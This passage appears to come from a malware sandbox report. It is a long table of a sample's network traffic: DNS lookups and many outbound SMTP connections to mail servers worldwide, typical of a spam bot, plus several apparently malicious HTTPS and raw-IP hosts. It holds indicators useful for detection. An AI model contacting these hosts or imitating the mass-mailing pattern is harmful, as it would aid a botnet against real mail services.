| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | out.teme3.fsnet.co.uk | udp |
| US | 8.8.8.8:53 | out.csh.org.tw | udp |
| US | 8.8.8.8:53 | sky.com | udp |
| US | 8.8.8.8:53 | tcpsva.org | udp |
| GB | 90.216.128.5:587 | sky.com | tcp |
| US | 34.238.178.141:2525 | tcpsva.org | tcp |
| US | 8.8.8.8:53 | sdibanjarmasin.id | udp |
| US | 8.8.8.8:53 | edu.univali.br | udp |
| US | 8.8.8.8:53 | uninga.jacad.com.br | udp |
| BR | 168.75.103.159:25 | uninga.jacad.com.br | tcp |
| BR | 200.169.52.200:2525 | edu.univali.br | tcp |
| ID | 103.142.21.130:587 | sdibanjarmasin.id | tcp |
| US | 8.8.8.8:53 | michaelcogliantry.com | udp |
| US | 8.8.8.8:53 | mail.alexia.cnsfatima.es | udp |
| US | 8.8.8.8:53 | aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | secure.mangatraders.com | udp |
| US | 8.8.8.8:53 | mbmail.mynet.com | udp |
| US | 8.8.8.8:53 | smtp.virgilio.it | udp |
| US | 8.8.8.8:53 | seznam.cz | udp |
| US | 8.8.8.8:53 | mxbiz1.qq.com | udp |
| US | 8.8.8.8:53 | mxb.mailgun.org | udp |
| US | 8.8.8.8:53 | sanoma.co | udp |
| TR | 212.101.98.165:25 | mbmail.mynet.com | tcp |
| US | 104.21.64.149:465 | michaelcogliantry.com | tcp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 69.16.230.165:587 | secure.mangatraders.com | tcp |
| SE | 51.20.180.70:587 | sanoma.co | tcp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 34.149.236.64:465 | mxb.mailgun.org | tcp |
| NL | 142.250.27.26:2525 | aspmx.l.google.com | tcp |
| NL | 142.250.27.26:2525 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | securesmtp.kadesign.ch | udp |
| US | 8.8.8.8:53 | out.EpicHK.com | udp |
| US | 8.8.8.8:53 | iypjdlyj.com | udp |
| US | 8.8.8.8:53 | mail.jazzforpeace.org | udp |
| US | 8.8.8.8:53 | securesmtp.angelspet.com.br | udp |
| US | 8.8.8.8:53 | mail.unigine.com | udp |
| US | 8.8.8.8:53 | mail.rbsbusinesscapital.com | udp |
| US | 8.8.8.8:53 | secure.contabilie.com.br | udp |
| HK | 103.86.78.2:25 | mxbiz1.qq.com | tcp |
| NL | 83.149.100.90:25 | mail.unigine.com | tcp |
| US | 8.8.8.8:53 | secure.zcomet.fr | udp |
| US | 8.8.8.8:53 | alt1.aspmx.l.google.com | udp |
| DE | 142.251.9.27:587 | alt1.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | mail.oapn.es | udp |
| US | 8.8.8.8:53 | aspmx2.googlemail.com | udp |
| US | 8.8.8.8:53 | mail.witteringpc.co.uk | udp |
| US | 8.8.8.8:53 | secure.sg.mc.gov.pt | udp |
| DE | 142.251.9.26:465 | aspmx2.googlemail.com | tcp |
| ES | 185.73.174.75:587 | mail.oapn.es | tcp |
| US | 8.8.8.8:53 | securesmtp.adecoagro.com | udp |
| US | 8.8.8.8:53 | secure.linwoodschools.org | udp |
| US | 8.8.8.8:53 | securesmtp.lozere.gouv.fr | udp |
| US | 8.8.8.8:53 | 5koepfe.de | udp |
| US | 8.8.8.8:53 | securesmtp.zing.cn | udp |
| US | 8.8.8.8:53 | out.audio-concept.com | udp |
| US | 8.8.8.8:53 | out.vbdqgvgr.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.gateshead.org | udp |
| US | 8.8.8.8:53 | rogers.com | udp |
| US | 8.8.8.8:53 | secure.feed-it.io | udp |
| CA | 40.85.218.2:587 | rogers.com | tcp |
| US | 8.8.8.8:53 | secure.div.ua | udp |
| US | 8.8.8.8:53 | albany-wa-gov-au.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | out.bngroup.com.br | udp |
| AU | 52.101.149.9:587 | albany-wa-gov-au.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | alt4.aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | securesmtp.incharge.nl | udp |
| NL | 142.250.27.26:25 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | mail.diever.com.br | udp |
| TW | 142.250.157.27:25 | alt4.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| HK | 8.218.126.38:25 | securesmtp.zing.cn | tcp |
| US | 8.8.8.8:53 | mxb-005e8003.gslb.pphosted.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.tpadp.com | udp |
| US | 8.8.8.8:53 | smtp.prezzocomprare.com | udp |
| US | 8.8.8.8:53 | mail.aleixo.de | udp |
| US | 8.8.8.8:53 | pandora.be | udp |
| US | 8.8.8.8:53 | smtp.calchoice.com | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| BE | 195.130.131.33:587 | pandora.be | tcp |
| US | 8.8.8.8:53 | csr-com-au.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | smtp.dpg.hu | udp |
| US | 8.8.8.8:53 | securesmtp.quebeccreation.ca | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| BR | 191.252.112.195:25 | mail.diever.com.br | tcp |
| AU | 52.101.151.0:25 | csr-com-au.mail.protection.outlook.com | tcp |
| US | 148.163.159.80:587 | mxb-005e8003.gslb.pphosted.com | tcp |
| US | 8.8.8.8:53 | mail.chaccau.com.br | udp |
| US | 8.8.8.8:53 | mail.uioytytr.com | udp |
| US | 8.8.8.8:53 | smtp.dialer.com | udp |
| US | 8.8.8.8:53 | smtp.ngsat.com.br | udp |
| US | 8.8.8.8:53 | ALT2.ASPMX.L.GOOGLE.COM | udp |
| US | 8.8.8.8:53 | mail.solinces.com | udp |
| US | 165.160.15.20:25 | smtp.dialer.com | tcp |
| FI | 142.250.150.26:587 | ALT2.ASPMX.L.GOOGLE.COM | tcp |
| US | 192.185.185.219:25 | mail.solinces.com | tcp |
| US | 8.8.8.8:53 | telekom.de | udp |
| US | 8.8.8.8:53 | mx00.ionos.fr | udp |
| US | 8.8.8.8:53 | securesmtp.kmchow.com | udp |
| DE | 212.227.15.41:465 | mx00.ionos.fr | tcp |
| DE | 80.158.67.40:587 | telekom.de | tcp |
| US | 8.8.8.8:53 | secure.aquantive.com | udp |
| US | 8.8.8.8:53 | mail.asdfmailk.com | udp |
| US | 8.8.8.8:53 | autograf.pl | udp |
| US | 8.8.8.8:53 | smtp.ig.com.br | udp |
| BR | 168.0.132.203:587 | smtp.ig.com.br | tcp |
| US | 75.2.24.159:587 | autograf.pl | tcp |
| DE | 3.122.230.153:587 | mail.asdfmailk.com | tcp |
| US | 8.8.8.8:53 | securesmtp.bridgecommunication.ro | udp |
| US | 8.8.8.8:53 | mail.yaghoo.fr | udp |
| US | 8.8.8.8:53 | mail.apps.correios.com.br | udp |
| HK | 210.245.166.68:587 | securesmtp.kmchow.com | tcp |
| US | 8.8.8.8:53 | mail.rsv12.ua | udp |
| US | 8.8.8.8:53 | mail.psisun.u-psud.fr | udp |
| US | 8.8.8.8:53 | sflhidta.org | udp |
| US | 8.8.8.8:53 | smtp.alinea.fr | udp |
| US | 8.8.8.8:53 | smtp.comcast.net | udp |
| US | 96.103.145.180:587 | smtp.comcast.net | tcp |
| US | 74.120.45.71:587 | sflhidta.org | tcp |
| US | 8.8.8.8:53 | mail.brssd.org | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 24.104.151.193:25 | mail.brssd.org | tcp |
| US | 8.8.8.8:53 | hotelurbano.com.br | udp |
| US | 8.8.8.8:53 | mail.bki.co.id | udp |
| US | 8.8.8.8:53 | mx-in.mail.hosting-platform.com | udp |
| US | 8.8.8.8:53 | secure.523gtr.com | udp |
| US | 8.8.8.8:53 | mail.tlccentre.ie | udp |
| US | 8.8.8.8:53 | mail.gandhara.com.au | udp |
| US | 35.186.229.225:587 | hotelurbano.com.br | tcp |
| US | 8.8.8.8:53 | tinhenry.com | udp |
| US | 8.8.8.8:53 | smtp.idworld.nt | udp |
| US | 8.8.8.8:53 | mx2.davita.iphmx.com | udp |
| US | 8.8.8.8:53 | securesmtp.pearlkite.co.uk | udp |
| US | 8.8.8.8:53 | fmail1.teol.net | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 172.67.179.152:465 | tinhenry.com | tcp |
| US | 68.232.137.70:587 | mx2.davita.iphmx.com | tcp |
| BA | 81.93.94.130:25 | fmail1.teol.net | tcp |
| US | 8.8.8.8:53 | mtsd.k12.nj.us | udp |
| US | 209.114.152.135:2525 | mtsd.k12.nj.us | tcp |
| US | 8.8.8.8:53 | azet.sk | udp |
| US | 8.8.8.8:53 | out.euro.com | udp |
| US | 8.8.8.8:53 | aragorn.eaitelecom.com.br | udp |
| NL | 142.250.27.26:25 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | smtp.lyokoweb.fr | udp |
| US | 8.8.8.8:53 | absamail.co.za | udp |
| US | 8.8.8.8:53 | smtp-mibc-fr-01.mailinblack.com | udp |
| US | 8.8.8.8:53 | chaybasten.com | udp |
| US | 8.8.8.8:53 | bbox.fr | udp |
| US | 8.8.8.8:53 | secure.rivkobg.com | udp |
| US | 8.8.8.8:53 | spamrelay.zxcs.nl | udp |
| US | 8.8.8.8:53 | smtp.vvs-ltd.poltava.ua | udp |
| US | 96.103.145.180:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | 358.fi | udp |
| US | 8.8.8.8:53 | out.centraxgt.com | udp |
| US | 8.8.8.8:53 | securesmtp.oausdhg.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | stikesmitrabundapersada.ac.id | udp |
| US | 8.8.8.8:53 | mail.hmidiaexterior.com.br | udp |
| US | 8.8.8.8:53 | pace.co.uk | udp |
| US | 8.8.8.8:53 | reticulum.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | out.ppi.com.tw | udp |
| US | 52.101.10.16:465 | reticulum.mail.protection.outlook.com | tcp |
| GB | 89.234.4.55:2525 | pace.co.uk | tcp |
| US | 75.2.70.75:465 | 358.fi | tcp |
| SK | 91.235.52.77:587 | azet.sk | tcp |
| FR | 40.89.148.181:587 | smtp-mibc-fr-01.mailinblack.com | tcp |
| NL | 185.104.28.12:25 | spamrelay.zxcs.nl | tcp |
| BR | 200.71.77.42:587 | aragorn.eaitelecom.com.br | tcp |
| US | 8.8.8.8:53 | mail.conyman.com | udp |
| FR | 145.239.130.85:465 | smtp.lyokoweb.fr | tcp |
| US | 50.16.218.27:587 | out.euro.com | tcp |
| US | 8.8.8.8:53 | smtp.inkmaker.com | udp |
| ES | 188.93.75.134:25 | mail.conyman.com | tcp |
| ZA | 196.41.6.140:587 | absamail.co.za | tcp |
| BR | 191.6.216.99:587 | mail.hmidiaexterior.com.br | tcp |
| GB | 193.203.116.26:25 | mx-in.mail.hosting-platform.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | masalakitchenfoods.com | udp |
| US | 15.197.148.33:2525 | masalakitchenfoods.com | tcp |
| US | 8.8.8.8:53 | mail.student.upce.cz | udp |
| US | 8.8.8.8:53 | yonkerspublicschools-org.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | gmsil.com | udp |
| US | 8.8.8.8:53 | taalim.ma | udp |
| US | 8.8.8.8:53 | mail.andrewgormley.com | udp |
| US | 8.8.8.8:53 | smtp.borcal.com.ar | udp |
| US | 8.8.8.8:53 | secure.koforum.net | udp |
| US | 8.8.8.8:53 | out.jonno.cixco.uk | udp |
| US | 8.8.8.8:53 | abv.bg | udp |
| US | 8.8.8.8:53 | mail.carensognainblu.es | udp |
| US | 8.8.8.8:53 | spam.gg.go.kr | udp |
| US | 8.8.8.8:53 | smtp.fox-events.fr | udp |
| NL | 142.250.27.26:587 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | crdt.org.kh | udp |
| US | 8.8.8.8:53 | h2pd.com | udp |
| US | 8.8.8.8:53 | smtp.comcast.net | udp |
| US | 8.8.8.8:53 | za-smtp-inbound-1.mimecast.co.za | udp |
| US | 8.8.8.8:53 | smtp.hsa-env.com | udp |
| US | 8.8.8.8:53 | mx.a.locaweb.com.br | udp |
| ZA | 41.74.197.210:587 | za-smtp-inbound-1.mimecast.co.za | tcp |
| BR | 186.202.4.42:465 | mx.a.locaweb.com.br | tcp |
| BG | 194.153.145.104:587 | abv.bg | tcp |
| US | 52.101.10.6:25 | yonkerspublicschools-org.mail.protection.outlook.com | tcp |
| US | 69.16.230.165:465 | h2pd.com | tcp |
| KR | 27.101.137.123:465 | spam.gg.go.kr | tcp |
| US | 198.49.23.144:587 | gmsil.com | tcp |
| ES | 212.227.145.58:587 | mail.carensognainblu.es | tcp |
| US | 3.130.204.160:465 | smtp.hsa-env.com | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| IL | 185.230.63.107:465 | crdt.org.kh | tcp |
| US | 8.8.8.8:53 | mx11.surfmailfilter.nl | udp |
| NL | 195.169.13.8:2525 | mx11.surfmailfilter.nl | tcp |
| US | 8.8.8.8:53 | securesmtp.yourtopnotch.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| NL | 142.250.27.26:587 | aspmx.l.google.com | tcp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 8.8.8.8:53 | tele2.fr | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | mxb-00133a01.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | out.hn.ns | udp |
| US | 8.8.8.8:53 | out.scharloo.eu | udp |
| US | 8.8.8.8:53 | smtp.progesys.ca | udp |
| US | 8.8.8.8:53 | out.post.dk | udp |
| US | 8.8.8.8:53 | smtp.davidmaxwell.ca | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.hotseat.ca | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 169.54.82.183:25 | mail.hotseat.ca | tcp |
| US | 8.8.8.8:53 | mail.universal-services.co.uk | udp |
| US | 8.8.8.8:53 | protonmail.fr | udp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 8.8.8.8:53 | out.evilpacket.org | udp |
| US | 8.8.8.8:53 | mx.generic-isp.com | udp |
| US | 67.231.153.149:465 | mxb-00133a01.gslb.pphosted.com | tcp |
| US | 3.33.139.32:587 | protonmail.fr | tcp |
| NL | 142.93.237.125:587 | mx.generic-isp.com | tcp |
| NL | 142.250.27.26:587 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | securesmtp.hregards.fr | udp |
| US | 8.8.8.8:53 | securesmtp.1spotify.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.altex-security.co.uk | udp |
| US | 8.8.8.8:53 | secure.multisatsnc.it.portal | udp |
| US | 8.8.8.8:53 | smtp.fastmail.be | udp |
| US | 8.8.8.8:53 | securesmtp.haubensak53.com | udp |
| US | 8.8.8.8:53 | luatminhkhue.vn | udp |
| US | 199.188.200.154:25 | mail.agenkey.com | tcp |
| US | 104.26.11.109:2525 | luatminhkhue.vn | tcp |
| US | 8.8.8.8:53 | mail.wvmllc.com | udp |
| US | 8.8.8.8:53 | securesmtp.yinki.org | udp |
| US | 8.8.8.8:53 | mxgw.bcc.gov.bd | udp |
| FI | 142.250.150.26:25 | ALT2.ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | mail17.lh.pl | udp |
| US | 8.8.8.8:53 | smtp.hotamil.com | udp |
| US | 8.8.8.8:53 | me.com | udp |
| BD | 43.229.13.205:25 | mxgw.bcc.gov.bd | tcp |
| US | 17.253.142.4:587 | me.com | tcp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 103.224.212.213:587 | securesmtp.1spotify.com | tcp |
| PL | 185.135.89.106:587 | mail17.lh.pl | tcp |
| IE | 52.164.206.56:587 | smtp.hotamil.com | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | hawthornes.co.uk | udp |
| US | 8.8.8.8:53 | securesmtp.umz.ac.ir | udp |
| US | 8.8.8.8:53 | mail.post.skynet.lt | udp |
| US | 8.8.8.8:53 | mail.mg-bacchamoise.fr | udp |
| US | 8.8.8.8:53 | santander.com.br | udp |
| US | 8.8.8.8:53 | oi-com0c.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | rangs.com | udp |
| NL | 23.200.188.67:587 | santander.com.br | tcp |
| US | 52.101.9.26:25 | oi-com0c.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | out.ag.com | udp |
| US | 8.8.8.8:53 | smtp.meto.ua | udp |
| US | 162.255.119.253:2525 | hawthornes.co.uk | tcp |
| US | 8.8.8.8:53 | iguacumaquinas-com-br.mail.protection.outlook.com | udp |
| NL | 142.250.27.26:2525 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | smtp.heijmans.nl | udp |
| US | 8.8.8.8:53 | citromail.hu | udp |
| DE | 167.99.248.199:587 | citromail.hu | tcp |
| BR | 52.101.198.0:25 | iguacumaquinas-com-br.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | secure.jamnme.net | udp |
| US | 8.8.8.8:53 | out.aslcs.co.uk | udp |
| US | 8.8.8.8:53 | secure.hilfiker.com | udp |
| US | 8.8.8.8:53 | secure.apexsql.com | udp |
| US | 8.8.8.8:53 | out.donquesotori.es | udp |
| US | 8.8.8.8:53 | mx00.ionos.de | udp |
| US | 8.8.8.8:53 | smtp1-mke.securence.com | udp |
| US | 8.8.8.8:53 | cnetmail.net | udp |
| US | 8.8.8.8:53 | smtp.mfernandes.net | udp |
| US | 8.8.8.8:53 | walla.com | udp |
| US | 8.8.8.8:53 | secure.ndt-ag.de | udp |
| DE | 212.227.15.41:587 | mx00.ionos.de | tcp |
| US | 216.17.3.48:2525 | smtp1-mke.securence.com | tcp |
| US | 34.102.212.0:587 | walla.com | tcp |
| BR | 191.252.112.195:465 | smtp.mfernandes.net | tcp |
| HK | 210.87.250.18:465 | mail.biznetvigator.com | tcp |
| US | 8.8.8.8:53 | secure.viareal.com | udp |
| US | 8.8.8.8:53 | mail.exon2000.hu | udp |
| US | 8.8.8.8:53 | tele2.it | udp |
| US | 8.8.8.8:53 | secure.marangoninegocios.com.br | udp |
| US | 8.8.8.8:53 | out.atoutcoeur.com | udp |
| US | 8.8.8.8:53 | mail.rathinam.in | udp |
| US | 8.8.8.8:53 | out.aepardilho.pt | udp |
| US | 8.8.8.8:53 | clearwire.net | udp |
| US | 8.8.8.8:53 | out.zjeannine.fr | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 67.222.21.222:587 | clearwire.net | tcp |
| GB | 216.58.212.211:2525 | mail.exon2000.hu | tcp |
| US | 164.90.244.158:465 | out.atoutcoeur.com | tcp |
| FI | 142.250.150.26:25 | ALT2.ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | mx01.ionos.co.uk | udp |
| US | 8.8.8.8:53 | meyers.fr | udp |
| US | 8.8.8.8:53 | mx2-eu1.ppe-hosted.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | gmbol.cem | udp |
| DE | 185.132.181.17:25 | mx2-eu1.ppe-hosted.com | tcp |
| DE | 217.72.192.67:465 | mx01.ionos.co.uk | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | securesmtp.znnohklf.fr | udp |
| US | 8.8.8.8:53 | out.konfer.sk | udp |
| US | 8.8.8.8:53 | mx-caprica.easydns.com | udp |
| US | 8.8.8.8:53 | youzend.net | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | pixnet.net | udp |
| US | 8.8.8.8:53 | aruba.it | udp |
| US | 8.8.8.8:53 | secure.intercable.net.ve | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 15.197.225.128:25 | youzend.net | tcp |
| IT | 62.149.188.200:587 | aruba.it | tcp |
| CA | 64.68.200.41:25 | mx-caprica.easydns.com | tcp |
| US | 8.8.8.8:53 | gonetor.com | udp |
| US | 8.8.8.8:53 | viagausa.info | udp |
| US | 8.8.8.8:53 | mail.intekom.com | udp |
| US | 8.8.8.8:53 | mail.34.com | udp |
| ZA | 197.234.175.113:587 | mail.intekom.com | tcp |
| US | 44.221.84.105:25 | secure.intercable.net.ve | tcp |
| CA | 52.60.87.163:587 | viagausa.info | tcp |
| SK | 213.215.124.143:2525 | out.konfer.sk | tcp |
| US | 8.8.8.8:53 | smtp.pernixllc.com | udp |
| US | 8.8.8.8:53 | mail.metameer.com | udp |
| US | 8.8.8.8:53 | dannybhai.com | udp |
| US | 8.8.8.8:53 | secure.metalsa.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| NL | 142.250.27.26:587 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | out.mbox301.tele2.se | udp |
| US | 8.8.8.8:53 | worldmail.fr | udp |
| US | 8.8.8.8:53 | contacto.ch | udp |
| BG | 194.153.145.104:587 | abv.bg | tcp |
| US | 8.8.8.8:53 | route1.mx.cloudflare.net | udp |
| US | 8.8.8.8:53 | spartannash-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | goods2order.com | udp |
| TW | 103.23.108.107:2525 | pixnet.net | tcp |
| US | 172.67.215.163:587 | dannybhai.com | tcp |
| IE | 52.215.95.29:465 | contacto.ch | tcp |
| US | 162.159.205.13:25 | route1.mx.cloudflare.net | tcp |
| US | 52.101.10.8:25 | spartannash-com.mail.protection.outlook.com | tcp |
| FR | 213.186.33.5:2525 | worldmail.fr | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | out.etu.utc.fr | udp |
| US | 8.8.8.8:53 | btconnect.com | udp |
| US | 64.98.135.35:465 | goods2order.com | tcp |
| GB | 216.58.212.211:25 | mail.exon2000.hu | tcp |
| US | 8.8.8.8:53 | secure.student.vuw.ac.nz | udp |
| US | 8.8.8.8:53 | out.mmogames.in | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | infotechservices.it | udp |
| US | 34.149.236.64:2525 | mxb.mailgun.org | tcp |
| US | 8.8.8.8:53 | keith-swift.co.uk | udp |
| US | 8.8.8.8:53 | mail.wallywatts.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | umeal.app | udp |
| US | 8.8.8.8:53 | secure.bigstring.co | udp |
| DE | 46.101.111.206:587 | mail.wallywatts.com | tcp |
| TH | 103.212.36.65:2525 | umeal.app | tcp |
| IT | 31.11.35.160:25 | infotechservices.it | tcp |
| US | 8.8.8.8:53 | out.magdolna.ro | udp |
| US | 8.8.8.8:53 | secure.roobykon.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | castflow.com.br | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | out.asila.org | udp |
| US | 8.8.8.8:53 | out.jetamp3.com | udp |
| US | 8.8.8.8:53 | mesa-sas.it | udp |
| US | 8.8.8.8:53 | smtp.adres.pl | udp |
| US | 8.8.8.8:53 | smtp.salefuse.com | udp |
| US | 8.8.8.8:53 | secure.almordalashmal.com | udp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 8.8.8.8:53 | secure.poet.de | udp |
| US | 8.8.8.8:53 | mail.yhjhg.com | udp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 13.248.169.48:2525 | smtp.salefuse.com | tcp |
| PL | 213.180.142.211:587 | smtp.adres.pl | tcp |
| IT | 80.88.86.113:465 | mesa-sas.it | tcp |
| US | 8.8.8.8:53 | out.bk.cob | udp |
| US | 8.8.8.8:53 | securesmtp.vistaas.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | smtp.bciswest.org | udp |
| US | 13.248.169.48:587 | securesmtp.vistaas.com | tcp |
| US | 8.8.8.8:53 | pathao.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 104.21.112.1:2525 | pathao.com | tcp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | secure.cegetel.net | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | out.digitalmail.info | udp |
| US | 8.8.8.8:53 | out.sarinecrossfit.ch | udp |
| US | 8.8.8.8:53 | securesmtp.sandaaker.com | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | student.staffs.ac.uk | udp |
| US | 8.8.8.8:53 | mail.newscorp.com | udp |
| US | 8.8.8.8:53 | bossy.pl | udp |
| US | 8.8.8.8:53 | out.adams.com.pl | udp |
| US | 8.8.8.8:53 | peelsb-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | smtp.jikai.net | udp |
| US | 8.8.8.8:53 | mail.hot.ee | udp |
| DE | 142.251.9.27:25 | alt1.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | secure.fbeaveraqb.com | udp |
| US | 8.8.8.8:53 | out.bamc.org | udp |
| US | 8.8.8.8:53 | secure.samosol.com | udp |
| US | 8.8.8.8:53 | hdm-stuttgart.de | udp |
| US | 8.8.8.8:53 | securesmtp.hallokak.my.id | udp |
| US | 8.8.8.8:53 | smtp.parallelkingdom.com | udp |
| PL | 62.129.192.178:2525 | out.adams.com.pl | tcp |
| US | 68.232.204.104:465 | mail.newscorp.com | tcp |
| DK | 185.138.56.213:587 | mail.hot.ee | tcp |
| CA | 52.101.192.0:25 | peelsb-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | smtp.wp.wp | udp |
| US | 8.8.8.8:53 | smtp.centrum.cz | udp |
| US | 8.8.8.8:53 | out.virtualarte.com.br | udp |
| CZ | 46.255.231.70:587 | smtp.centrum.cz | tcp |
| PL | 185.135.90.235:587 | bossy.pl | tcp |
| US | 8.8.8.8:53 | secure.univelox.com.br | udp |
| US | 8.8.8.8:53 | wavecutz.de | udp |
| NL | 142.250.27.26:465 | aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | secure.student.mbu.ac.th | udp |
| US | 8.8.8.8:53 | aon.at | udp |
| US | 199.59.243.228:587 | out.digitalmail.info | tcp |
| AT | 193.81.82.81:587 | aon.at | tcp |
| US | 8.8.8.8:53 | out.ppi.com.tw | udp |
| US | 8.8.8.8:53 | ecolecatholique.ca | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | out.eurelien.fr | udp |
| CA | 142.154.224.47:587 | ecolecatholique.ca | tcp |
| HK | 38.207.89.70:2525 | mail.yhjhg.com | tcp |
| US | 8.8.8.8:53 | mail.zoominternet.net | udp |
| US | 8.8.8.8:53 | mail.3ihtsux6.com | udp |
| US | 8.8.8.8:53 | mail.scg.com | udp |
| US | 8.8.8.8:53 | smtp.raphael.co.uk | udp |
| US | 8.8.8.8:53 | secure.emailrecup.info | udp |
| US | 8.8.8.8:53 | mail.parkcentral.biz | udp |
| US | 8.8.8.8:53 | securesmtp.ampolas.com.br | udp |
| US | 8.8.8.8:53 | smtp.utsavcollection.com | udp |
| US | 17.253.142.4:587 | me.com | tcp |
| US | 104.21.112.1:443 | pathao.com | tcp |
| US | 8.8.8.8:53 | oi.com.br | udp |
| CZ | 77.75.77.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | tsawwassenfirstnation-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | secure.altavista.com | udp |
| US | 8.8.8.8:53 | secure.interwap.co | udp |
| US | 8.8.8.8:53 | smtp.shaw.ca | udp |
| US | 8.8.8.8:53 | mail.sarenet.es | udp |
| GB | 90.216.128.5:587 | sky.com | tcp |
| US | 8.8.8.8:53 | nedbank.co.za | udp |
| DE | 47.246.146.57:465 | smtp.jikai.net | tcp |
| CA | 52.101.190.3:587 | tsawwassenfirstnation-com.mail.protection.outlook.com | tcp |
| ZA | 168.142.204.15:2525 | nedbank.co.za | tcp |
| ES | 194.30.0.214:587 | mail.sarenet.es | tcp |
| US | 8.8.8.8:53 | securesmtp.evant.com | udp |
| US | 8.8.8.8:53 | alumnos.udg.mx | udp |
| US | 8.8.8.8:53 | smtp.northlc.com | udp |
| CA | 64.59.136.142:587 | smtp.shaw.ca | tcp |
| BR | 187.6.211.40:587 | oi.com.br | tcp |
| US | 64.29.151.234:2525 | smtp.northlc.com | tcp |
| US | 104.21.112.1:443 | pathao.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | clix.pt | udp |
| US | 8.8.8.8:53 | secure.kuqefrymguj.com | udp |
